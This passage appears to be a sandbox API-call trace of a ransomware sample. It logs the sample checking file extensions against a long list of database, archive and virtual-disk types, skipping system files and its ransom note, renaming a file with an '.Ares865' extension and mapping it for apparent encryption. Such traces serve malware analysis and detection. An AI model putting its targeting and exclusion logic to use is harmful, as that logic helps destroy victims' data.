(lpString="rod") returned 3 [0087.948] lstrcmpiW (lpString1="dll", lpString2="rod") returned -1 [0087.948] lstrlenW (lpString="rodx") returned 4 [0087.948] lstrcmpiW (lpString1="_dll", lpString2="rodx") returned -1 [0087.948] lstrlenW (lpString="rpd") returned 3 [0087.948] lstrcmpiW (lpString1="dll", lpString2="rpd") returned -1 [0087.948] lstrlenW (lpString="rsd") returned 3 [0087.948] lstrcmpiW (lpString1="dll", lpString2="rsd") returned -1 [0087.948] lstrlenW (lpString="sas7bdat") returned 8 [0087.948] lstrcmpiW (lpString1=".trx_dll", lpString2="sas7bdat") returned -1 [0087.948] lstrlenW (lpString="sbf") returned 3 [0087.948] lstrcmpiW (lpString1="dll", lpString2="sbf") returned -1 [0087.948] lstrlenW (lpString="scx") returned 3 [0087.948] lstrcmpiW (lpString1="dll", lpString2="scx") returned -1 [0087.948] lstrlenW (lpString="sdb") returned 3 [0087.949] lstrcmpiW (lpString1="dll", lpString2="sdb") returned -1 [0087.949] lstrlenW (lpString="sdc") returned 3 [0087.949] lstrcmpiW (lpString1="dll", lpString2="sdc") returned -1 [0087.949] lstrlenW (lpString="sdf") returned 3 [0087.949] lstrcmpiW (lpString1="dll", lpString2="sdf") returned -1 [0087.949] lstrlenW (lpString="sis") returned 3 [0087.949] lstrcmpiW (lpString1="dll", lpString2="sis") returned -1 [0087.949] lstrlenW (lpString="spq") returned 3 [0087.949] lstrcmpiW (lpString1="dll", lpString2="spq") returned -1 [0087.949] lstrlenW (lpString="te") returned 2 [0087.949] lstrcmpiW (lpString1="ll", lpString2="te") returned -1 [0087.949] lstrlenW (lpString="teacher") returned 7 [0087.949] lstrcmpiW (lpString1="trx_dll", lpString2="teacher") returned 1 [0087.949] lstrlenW (lpString="tmd") returned 3 [0087.949] lstrcmpiW (lpString1="dll", lpString2="tmd") returned -1 [0087.949] lstrlenW (lpString="tps") returned 3 [0087.949] lstrcmpiW (lpString1="dll", lpString2="tps") returned -1 [0087.949] lstrlenW (lpString="trc") returned 3 [0087.949] lstrcmpiW (lpString1="dll", lpString2="trc") returned -1 [0087.949] lstrlenW (lpString="trc") returned 3 [0087.949] lstrcmpiW (lpString1="dll", lpString2="trc") returned -1 [0087.949] lstrlenW (lpString="trm") returned 3 [0087.949] lstrcmpiW (lpString1="dll", lpString2="trm") returned -1 [0087.949] lstrlenW (lpString="udb") returned 3 [0087.949] lstrcmpiW (lpString1="dll", lpString2="udb") returned -1 [0087.949] lstrlenW (lpString="udl") returned 3 [0087.949] lstrcmpiW (lpString1="dll", lpString2="udl") returned -1 [0087.949] lstrlenW (lpString="usr") returned 3 [0087.949] lstrcmpiW (lpString1="dll", lpString2="usr") returned -1 [0087.949] lstrlenW (lpString="v12") returned 3 [0087.949] lstrcmpiW (lpString1="dll", lpString2="v12") returned -1 [0087.949] lstrlenW (lpString="vis") returned 3 [0087.949] lstrcmpiW (lpString1="dll", lpString2="vis") returned -1 [0087.949] lstrlenW (lpString="vpd") returned 3 [0087.949] lstrcmpiW (lpString1="dll", lpString2="vpd") returned -1 [0087.949] lstrlenW (lpString="vvv") returned 3 [0087.949] lstrcmpiW (lpString1="dll", lpString2="vvv") returned -1 [0087.949] lstrlenW (lpString="wdb") returned 3 [0087.949] lstrcmpiW (lpString1="dll", lpString2="wdb") returned -1 [0087.950] lstrlenW (lpString="wmdb") returned 4 [0087.950] lstrcmpiW (lpString1="_dll", lpString2="wmdb") returned -1 [0087.950] lstrlenW (lpString="wrk") returned 3 [0087.950] lstrcmpiW (lpString1="dll", lpString2="wrk") returned -1 [0087.950] lstrlenW (lpString="xdb") returned 3 [0087.950] lstrcmpiW (lpString1="dll", lpString2="xdb") returned -1 [0087.950] lstrlenW (lpString="xld") returned 3 [0087.950] lstrcmpiW (lpString1="dll", lpString2="xld") returned -1 [0087.950] lstrlenW (lpString="xmlff") returned 5 [0087.950] lstrcmpiW (lpString1="x_dll", lpString2="xmlff") returned -1 [0087.950] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\1036\\ONINTL.REST.trx_dll.Ares865") returned 79 [0087.950] MoveFileExW (lpExistingFileName="C:\\Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\1036\\ONINTL.REST.trx_dll" (normalized: "c:\\users\\all users\\microsoft\\office\\uicaptions\\1036\\onintl.rest.trx_dll"), lpNewFileName="C:\\Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\1036\\ONINTL.REST.trx_dll.Ares865" (normalized: "c:\\users\\all users\\microsoft\\office\\uicaptions\\1036\\onintl.rest.trx_dll.ares865"), dwFlags=0x1) returned 1 [0087.951] CreateFileW (lpFileName="C:\\Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\1036\\ONINTL.REST.trx_dll.Ares865" (normalized: "c:\\users\\all users\\microsoft\\office\\uicaptions\\1036\\onintl.rest.trx_dll.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0087.951] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=260960) returned 1 [0087.951] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x200300) returned 0x2cd0020 [0087.951] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d2ef0 [0087.951] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x80) returned 0x2f00d8 [0087.951] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0087.952] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0087.952] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0087.952] CreateFileMappingW (hFile=0x118, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x3fe60, lpName=0x0) returned 0x15c [0087.955] MapViewOfFile (hFileMappingObject=0x15c, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x3fe60) returned 0x420000 [0088.006] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0088.007] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0088.007] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0088.007] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d2f68 [0088.007] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d2f68 | out: hHeap=0x2b0000) returned 1 [0088.007] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x100) returned 0x31afc8 [0088.007] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x104) returned 0x32afc8 [0088.007] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x31afc8 | out: hHeap=0x2b0000) returned 1 [0088.007] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x104) returned 0x32b0e0 [0088.007] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x208) returned 0x2d9d88 [0088.007] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x32b0e0 | out: hHeap=0x2b0000) returned 1 [0088.007] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d9d88 | out: hHeap=0x2b0000) returned 1 [0088.007] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x32afc8 | out: hHeap=0x2b0000) returned 1 [0088.008] UnmapViewOfFile (lpBaseAddress=0x420000) returned 1 [0088.010] CloseHandle (hObject=0x15c) returned 1 [0088.010] CloseHandle (hObject=0x118) returned 1 [0088.010] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d2ef0 | out: hHeap=0x2b0000) returned 1 [0088.010] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2f00d8 | out: hHeap=0x2b0000) returned 1 [0088.010] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2cd0020 | out: hHeap=0x2b0000) returned 1 [0088.011] FindNextFileW (in: hFindFile=0x2ccf68, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x1ab87a00, ftCreationTime.dwHighDateTime=0x1caca12, ftLastAccessTime.dwLowDateTime=0xeef4d890, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0x1ab87a00, ftLastWriteTime.dwHighDateTime=0x1caca12, nFileSizeHigh=0x0, nFileSizeLow=0x37560, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="OUTLLIBR.DLL.trx_dll", cAlternateFileName="OUTLLI~1.TRX")) returned 1 [0088.011] lstrcmpiW (lpString1="OUTLLIBR.DLL.trx_dll", lpString2="HOW TO BACK YOUR FILES.exe") returned 1 [0088.011] lstrcmpiW (lpString1="OUTLLIBR.DLL.trx_dll", lpString2="aoldtz.exe") returned 1 [0088.011] lstrcmpiW (lpString1="OUTLLIBR.DLL.trx_dll", lpString2=".") returned 1 [0088.012] lstrcmpiW (lpString1="OUTLLIBR.DLL.trx_dll", lpString2="..") returned 1 [0088.012] lstrcmpiW (lpString1="OUTLLIBR.DLL.trx_dll", lpString2="windows") returned -1 [0088.012] lstrcmpiW (lpString1="OUTLLIBR.DLL.trx_dll", lpString2="bootmgr") returned 1 [0088.012] lstrcmpiW (lpString1="OUTLLIBR.DLL.trx_dll", lpString2="temp") returned -1 [0088.012] lstrcmpiW (lpString1="OUTLLIBR.DLL.trx_dll", lpString2="pagefile.sys") returned -1 [0088.012] lstrcmpiW (lpString1="OUTLLIBR.DLL.trx_dll", lpString2="boot") returned 1 [0088.012] lstrcmpiW (lpString1="OUTLLIBR.DLL.trx_dll", lpString2="ids.txt") returned 1 [0088.012] lstrcmpiW (lpString1="OUTLLIBR.DLL.trx_dll", lpString2="ntuser.dat") returned 1 [0088.012] lstrcmpiW (lpString1="OUTLLIBR.DLL.trx_dll", lpString2="perflogs") returned -1 [0088.012] lstrcmpiW (lpString1="OUTLLIBR.DLL.trx_dll", lpString2="MSBuild") returned 1 [0088.012] lstrlenW (lpString="OUTLLIBR.DLL.trx_dll") returned 20 [0088.012] lstrlenW (lpString="C:\\Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\1036\\ONINTL.REST.trx_dll") returned 71 [0088.012] lstrcpyW (in: lpString1=0x2cce468, lpString2="OUTLLIBR.DLL.trx_dll" | out: lpString1="OUTLLIBR.DLL.trx_dll") returned="OUTLLIBR.DLL.trx_dll" [0088.012] lstrlenW (lpString="OUTLLIBR.DLL.trx_dll") returned 20 [0088.012] lstrlenW (lpString="Ares865") returned 7 [0088.012] lstrcmpiW (lpString1="trx_dll", lpString2="Ares865") returned 1 [0088.012] lstrlenW (lpString=".dll") returned 4 [0088.012] lstrcmpiW (lpString1="OUTLLIBR.DLL.trx_dll", lpString2=".dll") returned 1 [0088.012] lstrlenW (lpString=".lnk") returned 4 [0088.012] lstrcmpiW (lpString1="OUTLLIBR.DLL.trx_dll", lpString2=".lnk") returned 1 [0088.012] lstrlenW (lpString=".ini") returned 4 [0088.012] lstrcmpiW (lpString1="OUTLLIBR.DLL.trx_dll", lpString2=".ini") returned 1 [0088.012] lstrlenW (lpString=".sys") returned 4 [0088.012] lstrcmpiW (lpString1="OUTLLIBR.DLL.trx_dll", lpString2=".sys") returned 1 [0088.012] lstrlenW (lpString="OUTLLIBR.DLL.trx_dll") returned 20 [0088.012] lstrlenW (lpString="bak") returned 3 [0088.012] lstrcmpiW (lpString1="dll", lpString2="bak") returned 1 [0088.012] lstrlenW (lpString="ba_") returned 3 [0088.012] lstrcmpiW (lpString1="dll", lpString2="ba_") returned 1 [0088.012] lstrlenW (lpString="dbb") returned 3 [0088.012] lstrcmpiW (lpString1="dll", lpString2="dbb") returned 1 [0088.012] lstrlenW (lpString="vmdk") returned 4 [0088.012] lstrcmpiW (lpString1="_dll", lpString2="vmdk") returned -1 [0088.012] lstrlenW (lpString="rar") returned 3 [0088.012] lstrcmpiW (lpString1="dll", lpString2="rar") returned -1 [0088.012] lstrlenW (lpString="zip") returned 3 [0088.012] lstrcmpiW (lpString1="dll", lpString2="zip") returned -1 [0088.013] lstrlenW (lpString="tgz") returned 3 [0088.013] lstrcmpiW (lpString1="dll", lpString2="tgz") returned -1 [0088.013] lstrlenW (lpString="vbox") returned 4 [0088.013] lstrcmpiW (lpString1="_dll", lpString2="vbox") returned -1 [0088.013] lstrlenW (lpString="vdi") returned 3 [0088.013] lstrcmpiW (lpString1="dll", lpString2="vdi") returned -1 [0088.013] lstrlenW (lpString="vhd") returned 3 [0088.013] lstrcmpiW (lpString1="dll", lpString2="vhd") returned -1 [0088.013] lstrlenW (lpString="vhdx") returned 4 [0088.013] lstrcmpiW (lpString1="_dll", lpString2="vhdx") returned -1 [0088.013] lstrlenW (lpString="avhd") returned 4 [0088.013] lstrcmpiW (lpString1="_dll", lpString2="avhd") returned -1 [0088.013] lstrlenW (lpString="db") returned 2 [0088.013] lstrcmpiW (lpString1="ll", lpString2="db") returned 1 [0088.013] lstrlenW (lpString="db2") returned 3 [0088.013] lstrcmpiW (lpString1="dll", lpString2="db2") returned 1 [0088.013] lstrlenW (lpString="db3") returned 3 [0088.013] lstrcmpiW (lpString1="dll", lpString2="db3") returned 1 [0088.013] lstrlenW (lpString="dbf") returned 3 [0088.013] lstrcmpiW (lpString1="dll", lpString2="dbf") returned 1 [0088.013] lstrlenW (lpString="mdf") returned 3 [0088.013] lstrcmpiW (lpString1="dll", lpString2="mdf") returned -1 [0088.013] lstrlenW (lpString="mdb") returned 3 [0088.013] lstrcmpiW (lpString1="dll", lpString2="mdb") returned -1 [0088.013] lstrlenW (lpString="sql") returned 3 [0088.013] lstrcmpiW (lpString1="dll", lpString2="sql") returned -1 [0088.013] lstrlenW (lpString="sqlite") returned 6 [0088.013] lstrcmpiW (lpString1="rx_dll", lpString2="sqlite") returned -1 [0088.013] lstrlenW (lpString="sqlite3") returned 7 [0088.013] lstrcmpiW (lpString1="trx_dll", lpString2="sqlite3") returned 1 [0088.013] lstrlenW (lpString="sqlitedb") returned 8 [0088.013] lstrcmpiW (lpString1=".trx_dll", lpString2="sqlitedb") returned -1 [0088.013] lstrlenW (lpString="xml") returned 3 [0088.013] lstrcmpiW (lpString1="dll", lpString2="xml") returned -1 [0088.013] lstrlenW (lpString="$er") returned 3 [0088.013] lstrcmpiW (lpString1="dll", lpString2="$er") returned 1 [0088.013] lstrlenW (lpString="4dd") returned 3 [0088.013] lstrcmpiW (lpString1="dll", lpString2="4dd") returned 1 [0088.014] lstrlenW (lpString="4dl") returned 3 [0088.014] lstrcmpiW (lpString1="dll", lpString2="4dl") returned 1 [0088.014] lstrlenW (lpString="^^^") returned 3 [0088.014] lstrcmpiW (lpString1="dll", lpString2="^^^") returned 1 [0088.014] lstrlenW (lpString="abs") returned 3 [0088.014] lstrcmpiW (lpString1="dll", lpString2="abs") returned 1 [0088.014] lstrlenW (lpString="abx") returned 3 [0088.014] lstrcmpiW (lpString1="dll", lpString2="abx") returned 1 [0088.014] lstrlenW (lpString="accdb") returned 5 [0088.014] lstrcmpiW (lpString1="x_dll", lpString2="accdb") returned 1 [0088.014] lstrlenW (lpString="accdc") returned 5 [0088.014] lstrcmpiW (lpString1="x_dll", lpString2="accdc") returned 1 [0088.014] lstrlenW (lpString="accde") returned 5 [0088.014] lstrcmpiW (lpString1="x_dll", lpString2="accde") returned 1 [0088.014] lstrlenW (lpString="accdr") returned 5 [0088.014] lstrcmpiW (lpString1="x_dll", lpString2="accdr") returned 1 [0088.014] lstrlenW (lpString="accdt") returned 5 [0088.014] lstrcmpiW (lpString1="x_dll", lpString2="accdt") returned 1 [0088.014] lstrlenW (lpString="accdw") returned 5 [0088.014] lstrcmpiW (lpString1="x_dll", lpString2="accdw") returned 1 [0088.014] lstrlenW (lpString="accft") returned 5 [0088.014] lstrcmpiW (lpString1="x_dll", lpString2="accft") returned 1 [0088.014] lstrlenW (lpString="adb") returned 3 [0088.014] lstrcmpiW (lpString1="dll", lpString2="adb") returned 1 [0088.014] lstrlenW (lpString="adb") returned 3 [0088.014] lstrcmpiW (lpString1="dll", lpString2="adb") returned 1 [0088.014] lstrlenW (lpString="ade") returned 3 [0088.014] lstrcmpiW (lpString1="dll", lpString2="ade") returned 1 [0088.014] lstrlenW (lpString="adf") returned 3 [0088.014] lstrcmpiW (lpString1="dll", lpString2="adf") returned 1 [0088.014] lstrlenW (lpString="adn") returned 3 [0088.014] lstrcmpiW (lpString1="dll", lpString2="adn") returned 1 [0088.014] lstrlenW (lpString="adp") returned 3 [0088.014] lstrcmpiW (lpString1="dll", lpString2="adp") returned 1 [0088.014] lstrlenW (lpString="alf") returned 3 [0088.014] lstrcmpiW (lpString1="dll", lpString2="alf") returned 1 [0088.014] lstrlenW (lpString="ask") returned 3 [0088.014] lstrcmpiW (lpString1="dll", lpString2="ask") returned 1 [0088.015] lstrlenW (lpString="btr") returned 3 [0088.015] lstrcmpiW (lpString1="dll", lpString2="btr") returned 1 [0088.015] lstrlenW (lpString="cat") returned 3 [0088.015] lstrcmpiW (lpString1="dll", lpString2="cat") returned 1 [0088.015] lstrlenW (lpString="cdb") returned 3 [0088.015] lstrcmpiW (lpString1="dll", lpString2="cdb") returned 1 [0088.015] lstrlenW (lpString="ckp") returned 3 [0088.015] lstrcmpiW (lpString1="dll", lpString2="ckp") returned 1 [0088.015] lstrlenW (lpString="cma") returned 3 [0088.015] lstrcmpiW (lpString1="dll", lpString2="cma") returned 1 [0088.015] lstrlenW (lpString="cpd") returned 3 [0088.015] lstrcmpiW (lpString1="dll", lpString2="cpd") returned 1 [0088.015] lstrlenW (lpString="dacpac") returned 6 [0088.015] lstrcmpiW (lpString1="rx_dll", lpString2="dacpac") returned 1 [0088.015] lstrlenW (lpString="dad") returned 3 [0088.015] lstrcmpiW (lpString1="dll", lpString2="dad") returned 1 [0088.015] lstrlenW (lpString="dadiagrams") returned 10 [0088.015] lstrcmpiW (lpString1="LL.trx_dll", lpString2="dadiagrams") returned 1 [0088.015] lstrlenW (lpString="daschema") returned 8 [0088.015] lstrcmpiW (lpString1=".trx_dll", lpString2="daschema") returned -1 [0088.015] lstrlenW (lpString="db-journal") returned 10 [0088.015] lstrcmpiW (lpString1="LL.trx_dll", lpString2="db-journal") returned 1 [0088.015] lstrlenW (lpString="db-shm") returned 6 [0088.015] lstrcmpiW (lpString1="rx_dll", lpString2="db-shm") returned 1 [0088.015] lstrlenW (lpString="db-wal") returned 6 [0088.015] lstrcmpiW (lpString1="rx_dll", lpString2="db-wal") returned 1 [0088.015] lstrlenW (lpString="dbc") returned 3 [0088.015] lstrcmpiW (lpString1="dll", lpString2="dbc") returned 1 [0088.015] lstrlenW (lpString="dbs") returned 3 [0088.015] lstrcmpiW (lpString1="dll", lpString2="dbs") returned 1 [0088.015] lstrlenW (lpString="dbt") returned 3 [0088.015] lstrcmpiW (lpString1="dll", lpString2="dbt") returned 1 [0088.015] lstrlenW (lpString="dbv") returned 3 [0088.015] lstrcmpiW (lpString1="dll", lpString2="dbv") returned 1 [0088.015] lstrlenW (lpString="dbx") returned 3 [0088.015] lstrcmpiW (lpString1="dll", lpString2="dbx") returned 1 [0088.015] lstrlenW (lpString="dcb") returned 3 [0088.015] lstrcmpiW (lpString1="dll", lpString2="dcb") returned 1 [0088.016] lstrlenW (lpString="dct") returned 3 [0088.016] lstrcmpiW (lpString1="dll", lpString2="dct") returned 1 [0088.016] lstrlenW (lpString="dcx") returned 3 [0088.016] lstrcmpiW (lpString1="dll", lpString2="dcx") returned 1 [0088.016] lstrlenW (lpString="ddl") returned 3 [0088.016] lstrcmpiW (lpString1="dll", lpString2="ddl") returned 1 [0088.016] lstrlenW (lpString="dlis") returned 4 [0088.016] lstrcmpiW (lpString1="_dll", lpString2="dlis") returned -1 [0088.016] lstrlenW (lpString="dp1") returned 3 [0088.016] lstrcmpiW (lpString1="dll", lpString2="dp1") returned -1 [0088.016] lstrlenW (lpString="dqy") returned 3 [0088.016] lstrcmpiW (lpString1="dll", lpString2="dqy") returned -1 [0088.016] lstrlenW (lpString="dsk") returned 3 [0088.016] lstrcmpiW (lpString1="dll", lpString2="dsk") returned -1 [0088.016] lstrlenW (lpString="dsn") returned 3 [0088.016] lstrcmpiW (lpString1="dll", lpString2="dsn") returned -1 [0088.016] lstrlenW (lpString="dtsx") returned 4 [0088.016] lstrcmpiW (lpString1="_dll", lpString2="dtsx") returned -1 [0088.016] lstrlenW (lpString="dxl") returned 3 [0088.016] lstrcmpiW (lpString1="dll", lpString2="dxl") returned -1 [0088.016] lstrlenW (lpString="eco") returned 3 [0088.016] lstrcmpiW (lpString1="dll", lpString2="eco") returned -1 [0088.016] lstrlenW (lpString="ecx") returned 3 [0088.016] lstrcmpiW (lpString1="dll", lpString2="ecx") returned -1 [0088.016] lstrlenW (lpString="edb") returned 3 [0088.016] lstrcmpiW (lpString1="dll", lpString2="edb") returned -1 [0088.016] lstrlenW (lpString="epim") returned 4 [0088.016] lstrcmpiW (lpString1="_dll", lpString2="epim") returned -1 [0088.016] lstrlenW (lpString="fcd") returned 3 [0088.016] lstrcmpiW (lpString1="dll", lpString2="fcd") returned -1 [0088.016] lstrlenW (lpString="fdb") returned 3 [0088.016] lstrcmpiW (lpString1="dll", lpString2="fdb") returned -1 [0088.016] lstrlenW (lpString="fic") returned 3 [0088.016] lstrcmpiW (lpString1="dll", lpString2="fic") returned -1 [0088.016] lstrlenW (lpString="flexolibrary") returned 12 [0088.016] lstrcmpiW (lpString1=".DLL.trx_dll", lpString2="flexolibrary") returned -1 [0088.016] lstrlenW (lpString="fm5") returned 3 [0088.016] lstrcmpiW (lpString1="dll", lpString2="fm5") returned -1 [0088.017] lstrlenW (lpString="fmp") returned 3 [0088.017] lstrcmpiW (lpString1="dll", lpString2="fmp") returned -1 [0088.017] lstrlenW (lpString="fmp12") returned 5 [0088.017] lstrcmpiW (lpString1="x_dll", lpString2="fmp12") returned 1 [0088.017] lstrlenW (lpString="fmpsl") returned 5 [0088.017] lstrcmpiW (lpString1="x_dll", lpString2="fmpsl") returned 1 [0088.017] lstrlenW (lpString="fol") returned 3 [0088.017] lstrcmpiW (lpString1="dll", lpString2="fol") returned -1 [0088.017] lstrlenW (lpString="fp3") returned 3 [0088.017] lstrcmpiW (lpString1="dll", lpString2="fp3") returned -1 [0088.017] lstrlenW (lpString="fp4") returned 3 [0088.017] lstrcmpiW (lpString1="dll", lpString2="fp4") returned -1 [0088.017] lstrlenW (lpString="fp5") returned 3 [0088.017] lstrcmpiW (lpString1="dll", lpString2="fp5") returned -1 [0088.017] lstrlenW (lpString="fp7") returned 3 [0088.017] lstrcmpiW (lpString1="dll", lpString2="fp7") returned -1 [0088.017] lstrlenW (lpString="fpt") returned 3 [0088.017] lstrcmpiW (lpString1="dll", lpString2="fpt") returned -1 [0088.017] lstrlenW (lpString="frm") returned 3 [0088.017] lstrcmpiW (lpString1="dll", lpString2="frm") returned -1 [0088.017] lstrlenW (lpString="gdb") returned 3 [0088.017] lstrcmpiW (lpString1="dll", lpString2="gdb") returned -1 [0088.017] lstrlenW (lpString="gdb") returned 3 [0088.017] lstrcmpiW (lpString1="dll", lpString2="gdb") returned -1 [0088.017] lstrlenW (lpString="grdb") returned 4 [0088.017] lstrcmpiW (lpString1="_dll", lpString2="grdb") returned -1 [0088.017] lstrlenW (lpString="gwi") returned 3 [0088.017] lstrcmpiW (lpString1="dll", lpString2="gwi") returned -1 [0088.017] lstrlenW (lpString="hdb") returned 3 [0088.017] lstrcmpiW (lpString1="dll", lpString2="hdb") returned -1 [0088.017] lstrlenW (lpString="his") returned 3 [0088.017] lstrcmpiW (lpString1="dll", lpString2="his") returned -1 [0088.017] lstrlenW (lpString="ib") returned 2 [0088.017] lstrcmpiW (lpString1="ll", lpString2="ib") returned 1 [0088.017] lstrlenW (lpString="idb") returned 3 [0088.017] lstrcmpiW (lpString1="dll", lpString2="idb") returned -1 [0088.017] lstrlenW (lpString="ihx") returned 3 [0088.017] lstrcmpiW (lpString1="dll", lpString2="ihx") returned -1 [0088.018] lstrlenW (lpString="itdb") returned 4 [0088.018] lstrcmpiW (lpString1="_dll", lpString2="itdb") returned -1 [0088.018] lstrlenW (lpString="itw") returned 3 [0088.018] lstrcmpiW (lpString1="dll", lpString2="itw") returned -1 [0088.018] lstrlenW (lpString="jet") returned 3 [0088.018] lstrcmpiW (lpString1="dll", lpString2="jet") returned -1 [0088.018] lstrlenW (lpString="jtx") returned 3 [0088.018] lstrcmpiW (lpString1="dll", lpString2="jtx") returned -1 [0088.018] lstrlenW (lpString="kdb") returned 3 [0088.018] lstrcmpiW (lpString1="dll", lpString2="kdb") returned -1 [0088.018] lstrlenW (lpString="kexi") returned 4 [0088.018] lstrcmpiW (lpString1="_dll", lpString2="kexi") returned -1 [0088.018] lstrlenW (lpString="kexic") returned 5 [0088.018] lstrcmpiW (lpString1="x_dll", lpString2="kexic") returned 1 [0088.018] lstrlenW (lpString="kexis") returned 5 [0088.018] lstrcmpiW (lpString1="x_dll", lpString2="kexis") returned 1 [0088.018] lstrlenW (lpString="lgc") returned 3 [0088.018] lstrcmpiW (lpString1="dll", lpString2="lgc") returned -1 [0088.018] lstrlenW (lpString="lwx") returned 3 [0088.018] lstrcmpiW (lpString1="dll", lpString2="lwx") returned -1 [0088.018] lstrlenW (lpString="maf") returned 3 [0088.018] lstrcmpiW (lpString1="dll", lpString2="maf") returned -1 [0088.018] lstrlenW (lpString="maq") returned 3 [0088.018] lstrcmpiW (lpString1="dll", lpString2="maq") returned -1 [0088.018] lstrlenW (lpString="mar") returned 3 [0088.018] lstrcmpiW (lpString1="dll", lpString2="mar") returned -1 [0088.018] lstrlenW (lpString="marshal") returned 7 [0088.018] lstrcmpiW (lpString1="trx_dll", lpString2="marshal") returned 1 [0088.018] lstrlenW (lpString="mas") returned 3 [0088.018] lstrcmpiW (lpString1="dll", lpString2="mas") returned -1 [0088.018] lstrlenW (lpString="mav") returned 3 [0088.018] lstrcmpiW (lpString1="dll", lpString2="mav") returned -1 [0088.018] lstrlenW (lpString="maw") returned 3 [0088.018] lstrcmpiW (lpString1="dll", lpString2="maw") returned -1 [0088.018] lstrlenW (lpString="mdbhtml") returned 7 [0088.018] lstrcmpiW (lpString1="trx_dll", lpString2="mdbhtml") returned 1 [0088.018] lstrlenW (lpString="mdn") returned 3 [0088.018] lstrcmpiW (lpString1="dll", lpString2="mdn") returned -1 [0088.019] lstrlenW (lpString="mdt") returned 3 [0088.019] lstrcmpiW (lpString1="dll", lpString2="mdt") returned -1 [0088.019] lstrlenW (lpString="mfd") returned 3 [0088.019] lstrcmpiW (lpString1="dll", lpString2="mfd") returned -1 [0088.019] lstrlenW (lpString="mpd") returned 3 [0088.019] lstrcmpiW (lpString1="dll", lpString2="mpd") returned -1 [0088.019] lstrlenW (lpString="mrg") returned 3 [0088.019] lstrcmpiW (lpString1="dll", lpString2="mrg") returned -1 [0088.019] lstrlenW (lpString="mud") returned 3 [0088.019] lstrcmpiW (lpString1="dll", lpString2="mud") returned -1 [0088.019] lstrlenW (lpString="mwb") returned 3 [0088.019] lstrcmpiW (lpString1="dll", lpString2="mwb") returned -1 [0088.019] lstrlenW (lpString="myd") returned 3 [0088.019] lstrcmpiW (lpString1="dll", lpString2="myd") returned -1 [0088.019] lstrlenW (lpString="ndf") returned 3 [0088.019] lstrcmpiW (lpString1="dll", lpString2="ndf") returned -1 [0088.019] lstrlenW (lpString="nnt") returned 3 [0088.019] lstrcmpiW (lpString1="dll", lpString2="nnt") returned -1 [0088.019] lstrlenW (lpString="nrmlib") returned 6 [0088.019] lstrcmpiW (lpString1="rx_dll", lpString2="nrmlib") returned 1 [0088.019] lstrlenW (lpString="ns2") returned 3 [0088.019] lstrcmpiW (lpString1="dll", lpString2="ns2") returned -1 [0088.019] lstrlenW (lpString="ns3") returned 3 [0088.019] lstrcmpiW (lpString1="dll", lpString2="ns3") returned -1 [0088.019] lstrlenW (lpString="ns4") returned 3 [0088.019] lstrcmpiW (lpString1="dll", lpString2="ns4") returned -1 [0088.019] lstrlenW (lpString="nsf") returned 3 [0088.019] lstrcmpiW (lpString1="dll", lpString2="nsf") returned -1 [0088.019] lstrlenW (lpString="nv") returned 2 [0088.019] lstrcmpiW (lpString1="ll", lpString2="nv") returned -1 [0088.019] lstrlenW (lpString="nv2") returned 3 [0088.019] lstrcmpiW (lpString1="dll", lpString2="nv2") returned -1 [0088.019] lstrlenW (lpString="nwdb") returned 4 [0088.019] lstrcmpiW (lpString1="_dll", lpString2="nwdb") returned -1 [0088.019] lstrlenW (lpString="nyf") returned 3 [0088.019] lstrcmpiW (lpString1="dll", lpString2="nyf") returned -1 [0088.019] lstrlenW (lpString="odb") returned 3 [0088.019] lstrcmpiW (lpString1="dll", lpString2="odb") returned -1 [0088.020] lstrlenW (lpString="odb") returned 3 [0088.020] lstrcmpiW (lpString1="dll", lpString2="odb") returned -1 